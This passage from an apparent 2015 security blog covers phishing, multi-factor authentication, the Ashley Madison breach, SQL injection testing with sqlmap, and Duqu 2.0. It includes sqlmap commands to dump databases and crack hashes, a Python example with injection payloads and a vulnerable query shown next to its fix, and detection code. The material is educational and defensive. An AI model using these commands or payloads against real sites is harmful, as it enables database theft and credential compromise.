Users often receive emails that appear to be from their service provider. The email will stipulate an issue with their account and require an immediate password reset, change or confirmation.

The user will enter their password and be presented with a failure message or a confirmation. If the hacker is especially clever, the phishing site will relay the captured password to the real service provider (or set the same password there), so that everything appears normal to the user.

Even with strong and complex passwords, users can still be victims of phishing.  To avoid being phished, users should always check the legitimacy of an email before acting on it. If it seems fishy (excuse the pun), ignore it or delete it.

Moving beyond security passwords

Security passwords were once a relatively secure concept. That was until the proliferation of digital technologies and social media took full effect. As security solutions become more complex, the methods of authentication will need to follow suit. In the next blog post, we’ll discuss how multi-factor authentication may be the way forward.

Monday 31 August 2015

Cloud services, Multi-factor authentication and the death of the security question

Mainstream news has covered many compromises of internet facing services over the last five years.  This has included compromises of email systems, retail outlets, Internet auction sites and, last year, Apple's iCloud service, which led to a number of private photographs being exposed to the public.  The first assumption was that iCloud itself had been hacked or compromised, which Apple denied.

Accounts Compromised

Rather than iCloud in its entirety being compromised, individual accounts were.  It is assumed that the celebrity accounts were compromised with a brute force attack, in which many different passwords are tried against each account, something that only works where the service does not lock or throttle the account after repeated failures.  With the right software toolset, which can be acquired cheaply, numerous passwords can be tried against each account automatically.

Simple Passwords

Despite education from service providers and IT departments, the most commonly used passwords in a 2014 survey were "123456" and "password"!  With such simple passwords or common words, the password can be compromised in a matter of seconds using a dictionary attack.

Security (?) Questions

There are many ways to recover a password.  The service may issue a new password, or ask for confirmation via an out-of-band method such as the registered email address or an SMS to the registered mobile number.  It may be necessary to telephone a call centre and provide details over the telephone to reset the password.  The least secure is answering security questions to which only the user supposedly knows the answers.

It may seem like a secure way of resetting a password, as how many people would know your mother's maiden name, where you were born, what your favourite football team is, etc.?  The internet and social media have been great in many respects, but they expose a lot of information about an individual out into the wild.  Once it's out there, there is no way to control, edit or delete it.  Bear this in mind if you have to use this method for any website or application.

It would seem that this compromise is something new, but something very similar happened over ten years ago when Paris Hilton's mobile phone was hacked in 2005.  How was this done?  The T-Mobile Sidekick device had an internet facing dashboard.  If you forgot your password, you could answer some security questions, including date of birth and your pet's name.  All the security questions could be answered with an internet search engine.

Even before then, hackers were wise to how to gather this sort of personal information.  Around 15 years ago, there were email chains on how to generate your porn star name: you took your first pet's name and combined it with your mother's maiden name.  Information such as "Fido Jones" would have been very useful!

Complex Passwords, hard to remember?

As the levels of security have to rise, this can only make it more difficult to use the services or applications.  There is always a balance between usability and complexity.  We can encourage people to use a mixture of upper and lower case, special characters and numbers, but that will only mean more password resets, as these complex passwords are forgotten more easily.

Another piece of common advice is not to use the same password across multiple applications and services.  This only increases the user's capacity to forget a password!


Even with strong and complex passwords in place, the user can still be a victim of a phishing attack.  We are reminded to check the legitimacy of an email before acting on it, and if it seems fishy (excuse the pun) to ignore it or delete it. Many people have fallen for one of the simplest tricks, as the email looks so legitimate.

The bad guy sends out emails that look like an email from the service provider.  It tells the user that there is some sort of issue with the account that requires a password reset/change/confirmation.  The user enters their password, which is captured by the bad guy.  The user is then presented with either a failure message or a confirmation that all is OK and, if the attacker is clever, the captured password is relayed to the real service provider, so all seems right for the user.

Multi Factor Authentication

There are various ways, or factors, of authenticating users.  One form this can take is "Something you know", where the information is known to the user, such as a username, password, PIN or pattern.

Another form is "Something you have" (or something you're given), where the information is provided to the user through technology, such as a passcode from a hardware token, a passcode generated on a device such as a smartphone or computer, or a passcode sent via SMS to a known mobile telephone number.  If the known information and the provided information are different types of information, or factors, it becomes clear where the term two factor authentication comes from.

Other factors include "Something you are", through the use of biometrics such as iris scans, fingerprint readers, voice recognition and other forms tied to the physicality of the user.  There are also ways of analysing "Somewhere you are" through geolocation, allowing or denying access by the user's location.

A combination of these authentication methods, or factors, creates Multi Factor Authentication (MFA).

Proof and compliance

With the factors of authentication described above, it is harder for a hacker to access the service or website, but it is also harder for a user to deny an action.  Many online banking systems use a combination of passwords, PINs, tokens, SMS and unique codes to ensure transactions are genuine.  By using multi factor authentication, steps within compliance processes can be tied to specific users, so the actions cannot be denied.

Free protection

Service providers such as Apple's iCloud, Gmail, eBay and Facebook give the option to switch on two-step verification, where if you try to log in from a new device, a new browser or a different country, you will be prompted to enter a code that is sent to the registered mobile phone number.  The security is there and it's free.

The use of multi factor authentication is accepted as commonplace and widely used by individuals for personal services, such as email and banking.


Recent technology adoption within a corporate environment has been driven by domestic technology.  The rise of wireless, tablet and mobile computing has been driven from the use of these technologies within the domestic environment.

There is often a concern that the user community within an organisation struggles with new technology, but it's often the enforcement of unfamiliar technology that causes the user to become disengaged.

The use of multi factor authentication can only strengthen a network or website, and with this technology already used for personal accounts, corporate use will meet less resistance from the user community, especially where there is familiarity with the technology.

Cloud Support

As more corporate applications move to the Internet, cloud security becomes the concern of every IT Manager, IT Director, CSO, CISO, and in fact every member of an executive team.

As cloud based applications such as Salesforce and Microsoft Office 365 become popular, it is essential to remember these applications are the very lifeblood of an organisation.  The need for security and multi factor authentication becomes more apparent when looking to protect these web based applications.  Federation protocols such as SAML are designed to support cloud applications: the application hands sign-in over to the organisation's identity provider, which can then enforce multi factor authentication.

Impact to the business

A poorly designed or poorly implemented solution will impact the user adoption of any technology, but a familiar system will gain acceptance and executive sponsors.  Security is high on the executive board's agenda, so the impact of a compromise or a disgruntled employee outweighs financial considerations such as return on investment.

Multi factor authentication is not new, but it is an obvious solution to the many security challenges for organisations, whether the data and applications are located on premise, in data centres, in public cloud, in private cloud or a hybrid approach.  Security is no longer the concern of technical sponsors alone, but of the Executive Board.

Familiar security solutions such as Multi Factor Authentication, can only increase the security posture of an organisation, protecting the data and reputation of an organisation. 

Wednesday 22 July 2015

Morality vs Criminality: Ashley Madison Hack

As you may have read in the press, the Ashley Madison website was hacked.   What's the big deal, you may think, it's another compromised website.  Ashley Madison, as it says on its website, "is the online personals & dating destination for casual encounters, married dating, discreet encounters and extramarital affairs", with the tagline "Life is short, have an affair".  There are 37 million users across over 50 countries, around 1.2 million of whom live in the UK.

What was lost?

Personal data that was lost includes names, postal addresses, credit card numbers and sexual fantasies.  Made worse, the organisation charged a $19 fee to carry out a "full delete" on user accounts, which appears not to have been carried out.

Who did it?

The hackers claiming responsibility are the Impact Team, who stole the database comprehensively.  A recent article in The Guardian states that it was an insider threat, where the compromise was carried out by someone who had access to the systems but was not an employee, highlighting the need for control over third party access.


I've read a few comments that said that people should not be using these sorts of sites.  A crime has been committed in the database being stolen, but we are judging the victim for the crime.  Who is to blame if your house is broken into?  The criminal or the victim?  


Be aware that there is no safe place on the internet.  The internet is effectively a public place, to which the majority of people have access.  You are entrusting a third party to look after your data, so in this case a secure and unique password would not have helped the users.

The fault here lies with Ashley Madison.  Several security technologies could have helped prevent this from happening:

  • A Privileged Account Security solution could have prevented the third party from reusing their access to the system and, with some solutions, recorded the sessions used in the compromise.
  • A database encryption solution could have prevented the stolen data from being read, provided the keys were not available to the account that took it.
  • A Data Leak Prevention (DLP) solution could have detected and blocked the data leaving the organisation.
  • A Security Analytics solution could have spotted the abnormal access to the database and raised the alarm.
I have mentioned the Cyber Kill Chain in the past, and these solutions would have stopped the compromise, and the data leaving the organisation.

For me, this is not a case about morality, but we allow that to cloud our thoughts and allow a criminal act to be downplayed because of it.  This is a crime, but worse, a crime that could have been prevented.  The right solutions configured correctly, supported by policies and procedures, would have prevented this hack from happening.

Monday 20 July 2015

Web Application Testing - Hacking with KALI Linux

Web Application Testing for beginners

I was asked to give a presentation on Web Application Testing, so as well as supporting information as to why and what a test involves, I highlighted why OWASP is important, and showed how easy a simple SQL injection attack is to carry out.


Who or what are OWASP?  Wikipedia gives the definition as: “The Open Web Application Security Project is an online community dedicated to web application security.  The OWASP community includes corporations, educational organizations and individuals from around the world”

OWASP gives information on secure coding of web applications, and following their guidelines will help ensure the development of secure web applications and that security standards are upheld as part of this process.

KALI Linux

A common penetration testing platform is KALI Linux, which is available as an installable image or as a pre-built virtual machine.  It’s a Linux distribution bundling a suite of testing tools, including tools to test web applications.


One of the toolsets found in KALI Linux is OWASP ZAP, which will test websites for vulnerabilities.  It’s a vulnerability assessment (VA) tool and intercepting proxy for web applications.

You enter the website you want to test against.  I have to say, ensure you have the permission of the owner of the website, although there are many deliberately vulnerable practice websites that can be tested against.


One of the vulnerabilities that OWASP ZAP can test for are SQL injections.  Wikipedia defines SQL Injections as: "SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker)"

Find Database

Once you have a site that is vulnerable to SQL injection, you can use the SQLMAP tool on KALI via a Terminal session.

To use SQLMAP to enumerate the databases behind a website, use the following command (the URL should include the vulnerable parameter, for example ?id=1, as sqlmap tests the parameters it finds in the URL):

sqlmap -u <vulnerable site url> --dbs

This command will show whether any databases are reachable through the injection point.

Find Tables

Once you have the database information, the next task is to see what tables are available in that database, which can be done using the following command:

sqlmap -u <vulnerable site> -D <database name> --tables

Once you have the tables, you’ll probably want to have a closer look at any interesting ones.

Find Columns

Once you find an interesting table, it is useful to see what columns it has, which can be done using the following command:

sqlmap -u <vulnerable site> -D <database name> -T <table> --columns

Dump Data

Now you have the column information, you can dump the data using the following command:

sqlmap -u <vulnerable site> -D <database name> -T <table> --dump

Once the data has been dumped, sqlmap will ask whether you want it to attempt to crack any password hashes it recognises, using a dictionary attack with its default wordlist, and whether to try common suffixes as well.

Review Data

Copy and paste the data into Leafpad to view it (sqlmap also saves each dump as a CSV file in its output directory).  You’ll see passwords as hashes, and where they match common passwords in the default dictionary they will be displayed as clear text alongside.
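What the sqlmap steps above automate, as an added example that is not code from the original post: the vulnerable query pattern that ZAP flags, a UNION payload of the kind sqlmap sends to dump a table, the same query fixed with a bound parameter, and a dictionary crack of the dumped hashes that mirrors sqlmap's post-dump offer.  The database, user accounts and wordlist are constructed inline (SQLite in memory); there is no network access and no real site involved.

```python
"""Added example: the SQL injection pattern sqlmap exploits, the fix, and a
dictionary crack of dumped hashes. Everything is constructed inline in an
in-memory SQLite database; no network access, no real site."""
import hashlib
import sqlite3
from typing import Dict, List, Optional, Tuple

# Constructed sample accounts. Unsalted MD5 is deliberately weak here so the
# crack step below has something to find, as in many real breaches.
SAMPLE_USERS = [("alice", "123456"), ("bob", "password"), ("carol", "Tr0ub4dor&3")]
# Constructed stand-in for sqlmap's default wordlist.
WORDLIST = ["123456", "password", "qwerty", "letmein"]

# Payloads of the kind sqlmap generates. The trailing '-- ' comments out the
# closing quote the application appends after the injected value.
TAUTOLOGY_PAYLOAD = "x' OR '1'='1"
DUMP_PAYLOAD = "x' UNION SELECT username, password FROM users -- "


def build_db() -> sqlite3.Connection:
    """Create the constructed users table with MD5 password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    for uid, (name, pw) in enumerate(SAMPLE_USERS, start=1):
        conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                     (uid, name, hashlib.md5(pw.encode()).hexdigest()))
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, username: str) -> List[Tuple[str, str]]:
    """The 'before' code: untrusted input concatenated into the statement.
    This is the flaw ZAP reports and the first sqlmap command confirms."""
    query = f"SELECT username, password FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def hardened_lookup(conn: sqlite3.Connection, username: str) -> List[Tuple[str, str]]:
    """The fix, as OWASP's injection guidance recommends: a bound parameter.
    The driver sends the value as data, so quotes and UNIONs inside it are
    never parsed as SQL."""
    return conn.execute("SELECT username, password FROM users WHERE username = ?",
                        (username,)).fetchall()


def crack_hashes(rows: List[Tuple[str, str]], wordlist: List[str]) -> Dict[str, Optional[str]]:
    """Mirror sqlmap's post-dump offer: hash each dictionary word once and look
    the dumped hashes up. None means the password was not in the wordlist."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table.get(h) for user, h in rows}


def demo():
    conn = build_db()
    everyone = vulnerable_lookup(conn, TAUTOLOGY_PAYLOAD)  # 3 rows: the WHERE clause is always true
    dumped = vulnerable_lookup(conn, DUMP_PAYLOAD)         # every username/hash, like '--dump'
    safe = hardened_lookup(conn, DUMP_PAYLOAD)             # []: no user is literally named that
    return len(everyone), crack_hashes(dumped, WORDLIST), safe


if __name__ == "__main__":
    print(demo())
```

Note that carol's password survives the crack only because it is not in the wordlist; the real defence for the stored hashes is a salted, slow hash (bcrypt or similar), and the real defence for the query is the bound parameter, not filtering quotes out of the input.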


As you can see, with very little experience it’s incredibly easy to check for vulnerabilities and use simple commands to perform some very powerful tests against a site.  The recommendation is that any web application development team follows the OWASP Top 10 and that you test your web applications regularly.  If you are commissioning an external organisation, ensure they are offering an SLA for delivering a secure application, so they have to pull out all the stops to ensure security is built in, rather than it being an additional expense to you and your organisation for not building this into the contract.

Monday 29 June 2015

Duqu 2.0

On the 9th June 2015, Kaspersky announced to the world that they had been a victim of a cyber attack that targeted their own corporate network.  If an organisation like Kaspersky can become a victim of a cyber attack of this magnitude, all organisations can potentially become victims.  Data is the lifeblood of any organisation and the loss of critical data could mean the demise of that organisation.

Kaspersky, a Moscow-based security company, disclosed details of a cyber attack that they had been victim of.  After its discovery, Kaspersky launched an extensive investigation, gathering the facts and sharing the findings with the world.  The attack was dubbed Duqu 2.0, due to its similarity to an attack known as Duqu which was first spotted in 2011.  The use of Duqu and Duqu 2.0 is attributed to nation-state sponsored attacks, in this case trying to discover intellectual property, such as research into advanced persistent threats (APTs).

Cyber Kill Chain
The comprehensive nature of the attack meant it was highly likely to succeed.   Lockheed-Martin’s Cyber Kill Chain breaks down a cyber attack into seven steps.  Some attacks may only use some of these steps, while others will repeat them when attacking multiple systems prior to attacking the intended target.  The Duqu 2.0 attack not only followed the kill chain, but there were also elements repeated to make the attack more covert.

Reconnaissance/Weaponisation/Delivery /Exploitation
It is believed that an employee in one of the APAC offices was the target of a spear-phishing email, with a lure and redirect to a malicious dropper file that exploited a specific unpatched zero day vulnerability.  The attack was thorough, ensuring emails and browser history were cleared of all traces of the compromise.  Kaspersky confirm the machine was fully patched, leading to the assumption of a zero day exploitation.

Once on the network, the attacker was able to escalate unprivileged credentials to those of the Windows domain administrator using another zero day vulnerability. The attacker was then able to explore the network by moving laterally and deciding which machines to compromise.  Microsoft Windows Installer Packages (MSI) were used to deploy Duqu 2.0 across the network.  The attack software runs in memory only, and most modern production servers have high uptimes and are rarely power cycled.  Had a machine been power cycled, it would quickly have been re-infected from the other compromised machines.

Command and Control/Action on Objectives
Once the desired information was found by the attacker, the data was exfiltrated out of the network.  Kaspersky have reported that non-critical information was taken as part of the attack.

By analysing the sequence of the attack, a number of mitigating controls could be used to prevent the Duqu 2.0 and similar attacks.  Many of these elements may have been caught in isolation, but the prevention of the attack would need a more integrated approach to security.  The end goal for the attacker is to steal data.

The entry point to the network was the specific targeting of an individual or small group of people.  This highlights the need for user education at every level and in every department of an organisation.  In conjunction with education, an email security gateway with sandboxing technology may have prevented Duqu 2.0 from entering the network.

Web Access
An exploit kit would have been introduced to the network to check for unpatched and zero day vulnerabilities.  This was delivered through the web vector as a malicious link or a compromised site with a malicious file.  The presence of this could have been detected with a web security gateway, ideally with a sandboxing solution to check the behaviour of the file.

Zero Day vulnerabilities
The patching of operating systems, browsers, third party software and plug-ins is highly recommended, although this will not prevent zero day vulnerabilities from being exploited.  The removal of non-essential software from a computer will help reduce the attack surface, and the use of host based firewalls and host intrusion prevention systems can help.

Administrative Credentials
The administrative credentials within the network were compromised, which allowed the lateral movement within the network.  This is a shortcoming of using static passwords for a period of time before being cycled; giving a window of exposure if the password is compromised.  A privileged access management solution, would cycle the administrative credentials after each use and video record each session.  This would give a greater level of security to the credentials and traceability on what each administrative session had executed.

Lateral Movement
Many networks are segmented using VLANs, which offer limited security.  Micro-segmentation would protect servers or groups of servers with security controls that prevent East-West movement within the network.  Coupled with a security analytics engine, this would give context to abnormal traffic within the network.

Resident in memory
As Duqu 2.0 resides in memory, a number of mitigations could have prevented it from persisting.  The simple act of rebooting the server would have cleared the application from memory, although this can be difficult to perform routinely on critical production servers.  A whitelisting application control solution would have stopped the MSI from executing into memory by simply preventing the unknown application from running.

Data Exfiltration
A gateway data loss prevention solution would have seen the data leaving the network.  It is especially important that the solution is able to analyse data being drip-fed out, piecing together many smaller exfiltrations to gain visibility of the overall loss and to give context to the data leaving.
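The two detections described under Lateral Movement and Data Exfiltration, written out as an added example (this is not code from the original post, nor from any vendor product).  It runs over constructed flow records, the per-connection summaries a firewall or NetFlow collector produces, and uses a constructed internal address range, a constructed baseline of normal east-west traffic and constructed timestamps.  The first detector flags a source that fans out to several internal hosts it does not normally contact; the second sums outbound bytes per channel over a trailing window so that twenty small uploads are seen as one 1.2 MB loss, which a per-transfer size rule would never catch.

```python
"""Two of the detections described above, run over constructed flow records.

A flow record is one connection summary (timestamp, source, destination,
bytes sent).  The internal address range, the baseline of normal east-west
traffic and every record below are constructed for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

INTERNAL = ip_network("10.0.0.0/8")  # constructed: the organisation's address range

# Constructed baseline: which internal hosts each source normally talks to.
BASELINE = {"10.0.1.20": {"10.0.2.5"}}

# Constructed flow log, "timestamp src dst bytes_out", one record per line.
# 10.0.1.20 steps outside its baseline and sweeps four servers in 10.0.3.0/24;
# 10.0.2.5 makes one large but legitimate upload.
FLOW_LOG = """
2015-06-10T09:00:00 10.0.1.20 10.0.2.5 1200
2015-06-10T09:04:00 10.0.1.20 10.0.2.5 900
2015-06-10T09:10:00 10.0.1.20 10.0.3.11 4100
2015-06-10T09:11:00 10.0.1.20 10.0.3.12 3900
2015-06-10T09:12:00 10.0.1.20 10.0.3.13 4300
2015-06-10T09:13:00 10.0.1.20 10.0.3.14 4000
2015-06-10T09:30:00 10.0.2.5 203.0.113.8 400000
"""

# Constructed drip feed: 20 uploads of 60 kB from 10.0.3.11 to one external
# host, three minutes apart (1.2 MB in under an hour, no single flow large).
_start = datetime(2015, 6, 10, 9, 20)
DRIP_LOG = "\n".join(
    f"{(_start + i * timedelta(minutes=3)).isoformat()} 10.0.3.11 198.51.100.7 60000"
    for i in range(20)
)


def parse_flows(text):
    """Parse 'timestamp src dst bytes' lines into (datetime, src, dst, int) tuples, oldest first."""
    flows = []
    for line in text.strip().splitlines():
        ts, src, dst, nbytes = line.split()
        flows.append((datetime.fromisoformat(ts), src, dst, int(nbytes)))
    return sorted(flows)


def load_sample_flows():
    """The constructed records above, merged and ordered by time."""
    return parse_flows(FLOW_LOG.strip() + "\n" + DRIP_LOG)


def detect_lateral_movement(flows, baseline, window=timedelta(minutes=15), threshold=3):
    """Flag a source that reaches `threshold` or more internal hosts outside its
    baseline within `window`: the east-west fan-out of someone holding admin
    credentials, rather than a single unusual connection.  Returns {src: [hosts]}."""
    recent = defaultdict(list)   # src -> [(ts, dst)] of off-baseline internal contacts
    alerted = {}
    for ts, src, dst, _ in flows:
        if ip_address(dst) not in INTERNAL or dst in baseline.get(src, set()):
            continue
        hits = recent[src]
        hits.append((ts, dst))
        hits[:] = [(t, d) for t, d in hits if ts - t <= window]   # drop expired contacts
        new_hosts = {d for _, d in hits}
        if len(new_hosts) >= threshold:
            alerted.setdefault(src, set()).update(new_hosts)
    return {src: sorted(hosts) for src, hosts in alerted.items()}


def detect_drip_exfiltration(flows, window=timedelta(hours=1), total_limit=1_000_000):
    """Sum outbound bytes per (internal src, external dst) over a trailing window
    and flag channels whose cumulative total exceeds `total_limit`.  Returns
    {(src, dst): {"window_total": peak bytes seen in one window, "largest_flow": bytes}}
    so the reader can see that no single transfer would have tripped a per-flow rule."""
    recent = defaultdict(list)   # (src, dst) -> [(ts, bytes)] inside the window
    flagged = {}
    for ts, src, dst, nbytes in flows:
        if ip_address(src) not in INTERNAL or ip_address(dst) in INTERNAL:
            continue
        chan = (src, dst)
        hist = recent[chan]
        hist.append((ts, nbytes))
        hist[:] = [(t, b) for t, b in hist if ts - t <= window]
        total = sum(b for _, b in hist)
        if total > total_limit:
            entry = flagged.setdefault(chan, {"window_total": 0, "largest_flow": 0})
            entry["window_total"] = max(entry["window_total"], total)
            entry["largest_flow"] = max(entry["largest_flow"], max(b for _, b in hist))
    return flagged


if __name__ == "__main__":
    sample = load_sample_flows()
    print("lateral movement:", detect_lateral_movement(sample, BASELINE))
    print("drip exfiltration:", detect_drip_exfiltration(sample))
```

On the constructed data the first detector reports 10.0.1.20 reaching 10.0.3.11 to 10.0.3.14, and the second reports the 10.0.3.11 to 198.51.100.7 channel at 1,200,000 bytes in the hour with no flow above 60,000 bytes; the single 400 kB upload from 10.0.2.5 is not flagged.  Thresholds and the window are assumptions chosen for the sample and would be tuned to a real network's baseline.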

The Future
The Duqu 2.0 attack follows the seven-stage cyber kill chain; preventing the attack at any one of those stages would ultimately have stopped the data loss.  Kaspersky caught the attack before critical data loss had occurred.  As attacks such as these are published, it raises the profile for both vendors and attackers.  These techniques could still be used against any organisation, with the ultimate goal of stealing data.

To prevent these attacks, security vendors will need to take a more holistic view of security, working with other vendors that specialise in the areas they do not.  We see this collaborative working in technical partnerships between vendors and in OEM agreements to supply point solutions.  Alternatively, security vendors need to take a more comprehensive approach, tackling all stages of the kill chain with integrated solutions.

Solutions need to become less reactive to the known and more proactive towards the unknown.  There needs to be more focus on how security solutions deal with anomalies, where prevention and remediation are far more important than notification.  With a shortage of security staff and the gap growing year on year, vendors need to supply security intelligence in their solutions.  The future for these solutions is not to supply data logs and notifications, but to provide context and proactive remediation through intelligent analytics.

In the short term, ensure endpoint security solutions are running the latest versions, with the latest updates applied and the recommended features enabled.  There needs to be a focus on running supported operating systems with the latest patches, and on ensuring that third-party software and plug-ins are updated as well.  Any web and email security solutions need to be kept updated and their security policies regularly reviewed.  The final piece is user education, which should be an ongoing process where the learning is engaging, flexible and relevant.

As these attacks become more mainstream, where vertical and size no longer matter, look to future solutions that are able to tackle all stages of the kill chain, providing intelligence and context, and ultimately prevent the organisation's data from falling into the wrong hands.